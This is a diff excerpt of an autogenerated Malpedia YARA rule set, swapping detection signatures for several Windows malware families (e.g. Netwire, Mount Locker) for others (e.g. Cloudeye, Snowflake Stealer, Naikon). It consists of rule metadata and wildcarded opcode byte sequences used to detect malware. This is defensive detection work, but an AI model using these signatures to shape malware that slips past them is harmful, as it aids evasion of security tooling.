 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 40 ebea ff75f4 889c0574ffffff 8d8574ffffff 50 6a01 }
-		$sequence_1 = { 59 50 ffd6 8bd8 8b450c 6a00 }
-		$sequence_2 = { 8d85ecfdffff 59 57 50 ff15???????? }
-		$sequence_3 = { 57 56 68???????? ff7508 6a50 68???????? e8???????? }
-		$sequence_4 = { c68548ffffff0f c68549ffffff10 c6854affffff11 c6854bffffff12 c6854cffffff13 c6854dffffff14 }
-		$sequence_5 = { 59 85c0 59 7576 a0???????? 6a7f 888580fdffff }
-		$sequence_6 = { 888580fdffff 59 33c0 8dbd81fdffff }
-		$sequence_7 = { ff35???????? e8???????? 2b35???????? 83c40c 3bf3 7f1a 391d???????? }
-		$sequence_8 = { c3 55 8bec b808200000 e8???????? 53 56 }
-		$sequence_9 = { 85c0 742b 53 ff15???????? 50 }
+		$sequence_0 = { 0f8d87000000 488d3d37af0000 ba58000000 488bcd e8???????? 4885c0 7468 }
+		$sequence_1 = { 488bc8 ff15???????? 488d1548a20000 488bce }
+		$sequence_2 = { 88441420 0fb6d1 4883fa13 72e8 488d542420 }
+		$sequence_3 = { 80f90a 0f94c0 8944244c 488d052ec20000 4a8b14e0 41837c175000 }
+		$sequence_4 = { c3 83f914 7d0d 0fba72180f 83c110 e9???????? }
+		$sequence_5 = { 4053 4883ec20 488bd9 488d0da07b0000 483bd9 }
+		$sequence_6 = { 488d05247f0000 483bd8 7732 488bd3 }
+		$sequence_7 = { 7409 8bc8 e8???????? ebc9 488bcb 488bc3 488d156ba30000 }
+		$sequence_8 = { 0fb6040a 342e 6633c1 48ffc1 664123c0 }
+		$sequence_9 = { 488d05247f0000 483bd8 7732 488bd3 48b8abaaaaaaaaaaaa2a }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Unidentified_061_Auto : FILE
+rule MALPEDIA_Win_Cloudeye_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "59888b60-a3e6-5e9f-a441-429646fe0731"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_061_auto.yar#L1-L123"
+		id = "44608db0-2b3b-55a4-82c4-1c5317afcfea"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cloudeye_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "ee3ce5b6c77f09c690f7a934c26be09c58c4fcdee70275b61c00e527d8aa097d"
+		logic_hash = "54d2e3ccac7509c285f63d14127016b59266a9af9b4d7112de2a7058fc6a0ca1"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85d4fdffff 50 e8???????? c9 }
-		$sequence_1 = { 89b5f0fdffff 899decfdffff 89b5f4feffff 899df0feffff ff15???????? 8945fc }
-		$sequence_2 = { 51 8365fc00 8d45fc 50 68???????? 6801000080 ff15???????? }
-		$sequence_3 = { 8945f0 0fb705???????? 50 ff15???????? 668945ee }
-		$sequence_4 = { 68???????? 56 ff15???????? 83c41c 8d4601 5e eb09 }
-		$sequence_5 = { 7417 03f3 3bf7 7ccb eb2f 7d29 }
-		$sequence_6 = { 83cfff c6457300 3b7566 7cb5 3b7566 }
-		$sequence_7 = { 53 57 6a04 33ff 33db }
-		$sequence_8 = { 5b c9 c20800 81ec00040000 68???????? 68???????? ff15???????? }
-		$sequence_9 = { eb04 c645fb3d 6a05 8d45f8 50 ff750c c645fc00 }
+		$sequence_0 = { 64ff35c0000000 8f4548 c3 60 b055 }
+		$sequence_1 = { c70010000100 80fc8b ffb700500000 39c9 6afe ff5528 }
+		$sequence_2 = { 85da 8b4d18 bafee5190e e8???????? }
+		$sequence_3 = { 7570 206b65 7900 e8???????? 53 }
+		$sequence_4 = { ff50e0 6639d1 61 b8ffffffff }
+		$sequence_5 = { 83f800 0f8598000000 6685c1 8b4d20 81c100410000 c70107000100 51 }
+		$sequence_6 = { 81c29c000000 52 6a07 6aff 38ed 50 e8???????? }
+		$sequence_7 = { 5b 6685da 31c0 83c004 }
+		$sequence_8 = { 8bb714080000 38ef 8b8700080000 01f0 01c8 }
+		$sequence_9 = { 85db 837d7401 750a e8???????? 83f801 7405 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Onionduke_Auto : FILE
+rule MALPEDIA_Win_Wastedloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "938d9d3c-e9aa-58a2-a276-ad33d72e5ddf"
+		id = "c9b391e1-a439-5c84-8bc6-d01e7837fa3f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.onionduke_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wastedloader_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "68b93f2d8ab375a631a7b5d240fe20b360c3a52f2b84ec1bedaa31bed5aee8b0"
+		logic_hash = "f52a5046711dc64fff342d42959b67fac6d384f1f957f74196d547273f13eb4f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105975,32 +106130,32 @@ rule MALPEDIA_Win_Onionduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 663bcf 75f5 2bc6 d1f8 740c 8b45fc 8b08 }
-		$sequence_1 = { 51 8d4dd4 e8???????? 8b45e4 }
-		$sequence_2 = { 8b45e0 7303 8d45e0 6a00 6a00 6a03 }
-		$sequence_3 = { 40 84c9 75f9 2b45cc }
-		$sequence_4 = { 51 e8???????? 8bf8 8bc6 83c404 8d5001 8d9b00000000 }
-		$sequence_5 = { ff15???????? 85c0 78d8 8b45fc 8b550c 8b08 }
-		$sequence_6 = { 64a300000000 8bf1 8975f0 c706???????? c745fc01000000 8b4608 }
-		$sequence_7 = { 33d2 3955f0 0f94c2 837df410 8bf2 720c }
-		$sequence_8 = { 8b4dfc 33cd e8???????? 8be5 5d c20400 837df408 }
-		$sequence_9 = { 50 8d45e0 50 e8???????? 837df408 8b45e0 7303 }
+		$sequence_0 = { 7444 eb00 686bb90000 ff15???????? }
+		$sequence_1 = { 7ed7 7488 09b31ced6185 1ce2 }
+		$sequence_2 = { e8???????? 3d1e050000 c10147 833b38 }
+		$sequence_3 = { a828 b409 1c04 e8???????? }
+		$sequence_4 = { 7aec e471 e8???????? 0057bb 038919fc885d e479 }
+		$sequence_5 = { b9b5000000 8b55f8 66894a4c 8b45f8 }
+		$sequence_6 = { 8b45f8 66895056 b9b8000000 8b55f8 66894a58 8b45f8 0fb74858 }
+		$sequence_7 = { 0200 00e7 aa 53 }
+		$sequence_8 = { 2cbe 832061 5b 5b }
+		$sequence_9 = { 8b55f8 0fb7421e 83e854 8b4df8 6689411e ba86000000 }
 
 	condition:
-		7 of them and filesize < 671744
+		7 of them and filesize < 2677760
 }
-rule MALPEDIA_Win_Netwire_Auto : FILE
+rule MALPEDIA_Win_Virtualgate_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2c3233b5-61d2-5539-be18-0c5c0b8c6392"
+		id = "532683a6-8cc0-5db0-a44c-3ae7cc350778"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netwire_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.virtualgate_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "0b138a1b5ce5fce5b2fe27d94e6291c8b6ec4ddfb907147d54fe206b7b73d328"
+		logic_hash = "88ee3ecdf07b44d4f393563ecf7e06ea2c4377ec1fc56b55a448fb7ea043998d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106014,32 +106169,32 @@ rule MALPEDIA_Win_Netwire_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? c7042446000000 e8???????? c7042449000000 e8???????? }
-		$sequence_1 = { e8???????? c7442410000000f0 c744240c01000000 c744240800000000 c744240400000000 }
-		$sequence_2 = { c70424d0070000 e8???????? e9???????? e8???????? }
-		$sequence_3 = { 89442404 c70424???????? e8???????? a3???????? }
-		$sequence_4 = { 890424 e8???????? 83ec10 83f806 }
-		$sequence_5 = { c7042401000080 e8???????? c7042410000000 e8???????? }
-		$sequence_6 = { 85c0 750f c705????????05000000 e9???????? c705????????00000000 }
-		$sequence_7 = { 890424 e8???????? eb11 c7042496000000 e8???????? }
-		$sequence_8 = { c744241000000000 c744240c00000000 c744240800000000 c744240400000000 c7042440000000 }
-		$sequence_9 = { a3???????? e9???????? c705????????00000000 e9???????? c7042410020000 }
+		$sequence_0 = { 2bd1 83fa0f 777a 8b8c96b0270100 }
+		$sequence_1 = { 482bd6 4a0fbebc3820190200 8d4f01 4863c1 483bc2 0f8f15020000 83f904 }
+		$sequence_2 = { 488b03 833800 7513 488d151df90000 488d0df6f80000 e8???????? }
+		$sequence_3 = { 5d c3 488d05559a0100 488905???????? }
+		$sequence_4 = { 0100 682601006f 260100 7626 0100 7d26 }
+		$sequence_5 = { eb03 48ffc1 8a01 413ac3 }
+		$sequence_6 = { c3 4885d2 74e1 33ff 66897c2450 b020 eb03 }
+		$sequence_7 = { 488bce e8???????? 85c0 0f854d010000 33d2 }
+		$sequence_8 = { 49ffc0 48ffc2 493bd1 7427 418a00 8ac8 }
+		$sequence_9 = { e8???????? 44386dcf 7409 488b4db7 e8???????? 44386dff 7409 }
 
 	condition:
-		7 of them and filesize < 416768
+		7 of them and filesize < 323584
 }
-rule MALPEDIA_Win_Htprat_Auto : FILE
+rule MALPEDIA_Win_Snowflake_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6c918b98-1bd6-5c2a-a08e-afe038715c4f"
+		id = "bc09d07d-0ef6-59f5-8fc9-74662cfa791b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.htprat_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snowflake_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3d036a590536bfddf1556e3ceddf3bf5bcdba928f7034561835a6a007a09cb31"
+		logic_hash = "9c9e75fd4eed4eb18eb308bb8329401876776f47e6918bf3c298e3ce6d294888"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106053,32 +106208,32 @@ rule MALPEDIA_Win_Htprat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 0f8404020000 8b954cefffff 33f6 3bd6 0f84e1000000 }
-		$sequence_1 = { e8???????? 8b45d0 3b45c0 75e0 e9???????? 83f95b }
-		$sequence_2 = { 85c0 0f849a000000 8b8568efffff 03c6 3b8558efffff 7667 8b8394000000 }
-		$sequence_3 = { 897d98 56 33ff 47 }
-		$sequence_4 = { 668b5508 66891448 837e1408 895e10 7204 8b06 eb02 }
-		$sequence_5 = { 8d4dd4 51 50 e8???????? eb02 33c0 }
-		$sequence_6 = { b8???????? e8???????? 8b7508 33db 895de8 c746140f000000 895e10 }
-		$sequence_7 = { 84c0 7422 8d45fc 50 e8???????? 8bf0 59 }
-		$sequence_8 = { 75ec ebb5 8b75bc eb0f }
-		$sequence_9 = { e8???????? 84c0 742c 837e1408 8b4e10 7204 }
+		$sequence_0 = { ff7320 8d2c39 896c241c e8???????? 83c40c 89442414 85c0 }
+		$sequence_1 = { f3a5 8d74243c 89c7 0fb70c24 66894844 66895046 89f1 }
+		$sequence_2 = { e9???????? 8b0d???????? 898424d8000000 89842434010000 8d0532db5b00 899424dc000000 89942438010000 }
+		$sequence_3 = { f20f114808 f20f1100 83c010 8906 ff4608 83c410 5e }
+		$sequence_4 = { ffb42480000000 6a38 ff742448 55 e8???????? 8b5c2434 8d4524 }
+		$sequence_5 = { ff750c ff30 ff15???????? c9 c3 53 56 }
+		$sequence_6 = { eb11 89c1 ba05010000 68???????? e8???????? 58 0f0b }
+		$sequence_7 = { ff4608 ba???????? 89f1 6a03 e8???????? 59 89c2 }
+		$sequence_8 = { f20f1144242c e8???????? f20f5805???????? f20f104c242c 51 51 f20f5ec8 }
+		$sequence_9 = { ff4f3c 837e0801 7509 396e0c 7504 834f1cff 3906 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 6196224
 }
-rule MALPEDIA_Win_Sunorcal_Auto : FILE
+rule MALPEDIA_Win_Client_Maximus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a8968f16-8557-51ad-9926-5303f4012f89"
+		id = "7644986b-8879-5e3c-bd1e-48cdc3ff2e40"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sunorcal_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.client_maximus_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "7356cfcbffaef559e7c55d9c230d0091548077f346f07c94d1eede7494054ef4"
+		logic_hash = "2b5d2ecf5b1f20897666cf19bda4b06d4863b096982d3499177f71ebee7c8979"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106092,32 +106247,32 @@ rule MALPEDIA_Win_Sunorcal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a03 e8???????? cc 55 8bec 83ec0c }
-		$sequence_1 = { 5b c21000 8b442404 8b00 }
-		$sequence_2 = { 7c02 eb0e e8???????? e8???????? 85c0 }
-		$sequence_3 = { 5b c21000 8b442404 8b00 813863736de0 752a }
-		$sequence_4 = { 5b c21000 8b442404 8b00 813863736de0 752a 83781003 }
-		$sequence_5 = { 5e 5b c21000 8b442404 8b00 813863736de0 752a }
-		$sequence_6 = { eb0e e8???????? e8???????? 85c0 }
-		$sequence_7 = { 50 6a00 ff15???????? 6800040000 e8???????? }
-		$sequence_8 = { ff15???????? 68b7000000 ff15???????? 6a64 68???????? }
-		$sequence_9 = { c21000 8b442404 8b00 813863736de0 752a 83781003 }
+		$sequence_0 = { 83c601 39730c 7fe1 891424 e8???????? }
+		$sequence_1 = { 83c601 39730c 7fe1 891424 e8???????? 8b4304 }
+		$sequence_2 = { 8b5330 c744240800800000 c744240400000000 890424 8954240c ff5320 ff15???????? }
+		$sequence_3 = { 89f8 02441500 01c6 89f0 0fb6c0 }
+		$sequence_4 = { 81f900010000 881403 75d1 5b 5e }
+		$sequence_5 = { 8b442420 c70424???????? a3???????? e8???????? b801000000 }
+		$sequence_6 = { 56 53 8b5c2414 8b6c2418 6690 880403 83c001 }
+		$sequence_7 = { 85c0 7438 c70424???????? ffd3 }
+		$sequence_8 = { 89f0 0fb6c0 0fb61403 88140b }
+		$sequence_9 = { 85d2 7511 8b5034 85d2 740a 8b4018 85c0 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Klrd_Auto : FILE
+rule MALPEDIA_Win_Helauto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f2ac53cd-82a8-55ea-badd-f6f1aae58f93"
+		id = "8f4c5f14-ca45-53fe-8db7-58ae81e6cff8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.klrd_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.helauto_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "0fc6f030ea4bb49d87359f96c6eceeeaeffbdd94bdee42030f76f2d7ec66a19a"
+		logic_hash = "8c0415faca54a4465c0b97b35f2aed1c836ec68c9df037f6186699e53a26046b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106131,32 +106286,32 @@ rule MALPEDIA_Win_Klrd_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85fcefffff 50 e8???????? 59 50 }
-		$sequence_1 = { 8d85fcefffff 50 57 ff15???????? 57 ff15???????? }
-		$sequence_2 = { e8???????? 59 50 8d85fcefffff 50 57 }
-		$sequence_3 = { 3c00 0f8485020000 3c03 0f847d020000 3c09 0f8475020000 3c08 }
-		$sequence_4 = { c685c0fdffff00 68ff000000 6a00 8d85c1fdffff 50 e8???????? 83c40c }
-		$sequence_5 = { 59 59 ff7510 ff750c ff7508 ff35???????? ff15???????? }
-		$sequence_6 = { ebcc 8a85e7feffff 8885acfcffff 80bdacfcffff08 742f }
-		$sequence_7 = { 56 56 6a04 56 56 68000000c0 68???????? }
-		$sequence_8 = { 59 8d7dec f3a5 8b45ec 25ff000000 8885e7feffff 3c00 }
-		$sequence_9 = { ffb5b0fcffff ff15???????? 8985c8feffff 83bdc8feffff00 7515 ff15???????? }
+		$sequence_0 = { 8bf8 59 8bc6 6a0a 33d2 59 }
+		$sequence_1 = { aa 8d8528feffff c7855cffffff01010000 50 66899d60ffffff }
+		$sequence_2 = { 8dbd9de5ffff c6859ce5ffff30 f3ab 66ab aa }
+		$sequence_3 = { 8b4510 69c0f4010000 50 8945ec }
+		$sequence_4 = { 6a44 8d85a8feffff 53 50 }
+		$sequence_5 = { 3b4510 75ad 395dfc 7409 }
+		$sequence_6 = { ff75fc ff15???????? 3bc3 0f8448070000 8d45b8 }
+		$sequence_7 = { 50 8d8598f7ffff 68ff030000 50 }
+		$sequence_8 = { e8???????? 8b45d4 83c40c 898568ffffff 8b45d0 6a1f }
+		$sequence_9 = { a3???????? 50 ff15???????? e9???????? 8b442408 48 7509 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Chairsmack_Auto : FILE
+rule MALPEDIA_Win_Microbackdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2de2e9d5-c2ea-5429-bfd2-5525076f44e7"
+		id = "ca439651-8945-55d7-8b43-498ad02227fd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chairsmack"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chairsmack_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.microbackdoor_auto.yar#L1-L179"
 		license_url = "N/A"
-		logic_hash = "97781ffb695d6aa345e6e0e1fc6bc5189db5a22419050af0ce259dc4d2e28203"
+		logic_hash = "a9f80afe51613a501aee1e06cfe93241c41ac6752fa256f5ea6aad4ef6ad5201"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106170,32 +106325,38 @@ rule MALPEDIA_Win_Chairsmack_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5d08 ebd3 83fe03 75cb 8b45c0 ff7050 ff75ec }
-		$sequence_1 = { 8b4de0 83c104 e9???????? 8b542408 8d420c 8b4adc 33c8 }
-		$sequence_2 = { 50 8b4508 03c1 53 50 e8???????? 83c40c }
-		$sequence_3 = { 8bff 8b06 8d8d5cfeffff 3bc1 7409 83780400 8d7004 }
-		$sequence_4 = { c745d000000000 720b ff759c e8???????? 83c404 8b4598 }
-		$sequence_5 = { 7517 68cb0a0000 68???????? 68???????? e8???????? 83c40c 3bde }
-		$sequence_6 = { 52 8b45ec 50 e8???????? 83c40c 50 e8???????? }
-		$sequence_7 = { 83c41c ba???????? b9???????? e8???????? 8bf0 85db 7517 }
-		$sequence_8 = { 0106 e8???????? 8d4dd8 e8???????? 8d4d08 e8???????? 8d4d14 }
-		$sequence_9 = { 68???????? e8???????? 83ec1c c68424b803000062 8bcc 8964244c }
+		$sequence_0 = { 56 6a00 68e9fd0000 ff15???????? 33c0 50 50 }
+		$sequence_1 = { 4863c8 4803d9 443823 75b3 418bf5 e9???????? 418bc7 }
+		$sequence_2 = { 448d6f01 b940000000 418bd5 ff15???????? 488bd8 4885c0 0f8441010000 }
+		$sequence_3 = { 8d4801 83f901 7620 03d8 3bdf 7cda b801000000 }
+		$sequence_4 = { 0f849a000000 48899c24b0040000 4889bc2488040000 4c89bc2480040000 e8???????? 8bf8 e8???????? }
+		$sequence_5 = { 59 59 85c0 74eb 56 }
+		$sequence_6 = { ff15???????? 85c0 7507 ffd7 e9???????? 8d8570feffff 50 }
+		$sequence_7 = { e8???????? 59 8bc8 81e1ffffff7f 83f902 741e }
+		$sequence_8 = { eb25 488bcb 458be7 418bf5 }
+		$sequence_9 = { 410fb7f0 448bf2 488bd9 e8???????? }
+		$sequence_10 = { 7507 33c0 66894473fe 8d4bfe 33d2 668b4102 8d4902 }
+		$sequence_11 = { 8b45f0 8945e0 8d45dc 6a08 }
+		$sequence_12 = { a3???????? 85c0 740d ffd7 3db7000000 0f8446010000 56 }
+		$sequence_13 = { 8b45fc 6a01 59 0f44c1 5f 5e 5b }
+		$sequence_14 = { 4885d2 7410 46380c01 7502 ffc0 }
+		$sequence_15 = { ebe0 ff15???????? 488d0de93e0000 8bd0 e8???????? ebc8 }
 
 	condition:
-		7 of them and filesize < 1974272
+		7 of them and filesize < 123904
 }
-rule MALPEDIA_Win_Mount_Locker_Auto : FILE
+rule MALPEDIA_Win_Naikon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2ef861fc-00f6-570d-889b-9134868ef5a0"
+		id = "9a0d1ff4-6123-5ada-8c4c-3a20072403a8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mount_locker_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.naikon_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "7b77b6c0c433631050c62ceb54745fc365be8fc933570e0c4c919105bbc01b03"
+		logic_hash = "482df4e8a690a40d5dd089da89ade7d874a9359b42eeeb91d9707824c08e20e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106209,38 +106370,32 @@ rule MALPEDIA_Win_Mount_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 498be8 4d8bc8 4c8bc2 4c8bf2 }
-		$sequence_1 = { f30f5905???????? 0f5ad0 66490f7ed0 e8???????? }
-		$sequence_2 = { 488b0b 41b902000000 4533c0 33d2 }
-		$sequence_3 = { 4533c9 488b4c2458 33d2 c744243001000000 }
-		$sequence_4 = { 4c8bc2 4c8bf2 8bf1 33d2 }
-		$sequence_5 = { 488d4df0 4889442428 4533c9 4533c0 }
-		$sequence_6 = { 8bc8 81e10000ffff 81f900000780 7503 0fb7c0 }
-		$sequence_7 = { 4c8b05???????? 488bcb 488b15???????? e8???????? 85c0 }
-		$sequence_8 = { 7505 e8???????? 833d????????00 7409 833d????????00 7505 e8???????? }
-		$sequence_9 = { ff15???????? 85c0 7509 f0ff05???????? }
-		$sequence_10 = { 415e 5f 5e c3 488bc4 48895010 4c894018 }
-		$sequence_11 = { 6a01 ff15???????? 8d4538 50 68???????? }
-		$sequence_12 = { 83ef01 75ec 6a20 59 8a06 884620 46 }
-		$sequence_13 = { 68???????? e8???????? 8d45c0 50 ff750c }
-		$sequence_14 = { 6815020100 6a08 83ceff ff15???????? 50 }
-		$sequence_15 = { 68???????? 6a01 e8???????? 83c40c 5e c3 56 }
+		$sequence_0 = { 8bc6 8088e130011008 40 3dff000000 }
+		$sequence_1 = { 3bc3 7c03 53 eb01 50 8b4dfc 8d043e }
+		$sequence_2 = { 8d450c 6a03 50 8bce e8???????? 8b06 }
+		$sequence_3 = { 8bf1 ff742410 e8???????? 85c0 753f 8d4e7c 8d4670 }
+		$sequence_4 = { a1???????? 682c010000 b9???????? 50 8d9500f0ffff }
+		$sequence_5 = { 50 8d85f8feffff 50 ffd7 894508 8b85a8fcffff }
+		$sequence_6 = { 8bce e8???????? 8b06 8b4e08 57 0fb60c01 }
+		$sequence_7 = { 8bd8 ffd7 5f 8bc3 }
+		$sequence_8 = { 0fbec3 8a80e8d10010 83e00f eb02 33c0 0fbe84c108d20010 }
+		$sequence_9 = { 8b85a8fcffff 83e010 3c10 7503 6a01 5e }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Pwndlocker_Auto : FILE
+rule MALPEDIA_Win_Unidentified_069_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "276b9929-07b6-5961-91ba-ea8cd06bb086"
+		id = "e6d12ecf-2105-5a78-ac5d-ef3697e64524"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pwndlocker_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_069_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "32e46025ac999bee5e5546895b079eecc269f28102bbbcf16da2fe4d978f576c"
+		logic_hash = "ca9594399e09dcc31b85088d5c725560cc890838ff6242191d21562960d61f9b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106254,32 +106409,32 @@ rule MALPEDIA_Win_Pwndlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75e0 5a 8b7224 01de 31c0 668b044e 8b721c }
-		$sequence_1 = { 8b4e18 8b5620 01da 56 e334 49 8d348a }
-		$sequence_2 = { e334 49 8d348a 8b36 }
-		$sequence_3 = { ebf4 3b7df0 75e0 5a 8b7224 }
-		$sequence_4 = { 8d348a 8b36 01de 31ff 31c0 fc }
-		$sequence_5 = { c1cf0d 01c7 ebf4 3b7df0 75e0 5a }
-		$sequence_6 = { 7407 c1cf0d 01c7 ebf4 3b7df0 75e0 }
-		$sequence_7 = { fc ac 84c0 7407 c1cf0d 01c7 ebf4 }
-		$sequence_8 = { fc ac 84c0 7407 c1cf0d 01c7 }
-		$sequence_9 = { 8b7224 01de 31c0 668b044e }
+		$sequence_0 = { e8???????? 8bf8 83c428 83ffff 7428 8d041f }
